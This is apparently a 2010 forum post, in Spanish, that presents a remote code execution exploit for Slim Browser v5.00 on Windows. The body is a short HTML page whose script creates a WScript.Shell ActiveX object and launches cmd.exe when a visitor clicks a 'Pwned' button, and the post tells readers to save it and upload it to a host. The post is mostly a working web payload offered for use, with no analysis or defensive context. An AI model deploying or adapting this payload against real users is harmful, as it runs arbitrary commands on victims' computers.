Dom Oct 31, 2010 9:22 pm
- Código:
===================================
Slim Browser v5.00 Remote Code Execution
===================================
# Author: PoisonCode
# Download Exploit Code
# Download Vulnerable app
# Title: Slim Browser v5.00
# Software Link:http://slimbrowser.flashpeak.com/release/sbsetup.exe
# Version: 5.00
# Platform:Windows
# Author: PoisonCode
# CVE-ID:()
_____ _____ _ _
| __ \ / ____| (_) |
| |__) | (___ ___ ___ _ _ _ __ _| |_ _ _
| ___/ \___ \ / _ \/ __| | | | '__| | __| | | |
| | ____) | __/ (__| |_| | | | | |_| |_| |
|_| |_____/ \___|\___|\__,_|_| |_|\__|\__, |
__/ |
|___/
Exploit
---------------------------------------------------------
Lo guardamos y subimos a un host y listo
<script>
function go() {
w = new ActiveXObject("WScript.Shell");
w.run('cmd.exe');
return true;
}
</script>
<form>
<h1>Abrir Cmd Pwned by PoisonCode</h1>
<input type="button" value="Pwned"
onClick="return go()">
</form>